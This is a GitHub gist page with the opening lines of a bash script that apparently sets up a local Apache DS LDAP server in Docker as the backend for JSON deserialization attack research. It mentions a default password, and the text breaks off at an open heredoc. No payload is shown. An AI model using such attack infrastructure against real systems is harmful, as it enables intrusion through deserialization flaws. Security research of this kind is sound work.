Skip to content

Instantly share code, notes, and snippets.

View Raul1718's full-sized avatar
Focusing

raul17 Raul1718

Focusing
View GitHub Profile
@Raul1718
Raul1718 / json-deserialization-ldap.sh
Created August 24, 2018 11:50 — forked from topolik/json-deserialization-ldap.sh
Backend script based on @pwntester JSON deserialization research
#!/bin/bash
echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20
# password: secret, if used with LDAP login
(cat <<"EOF"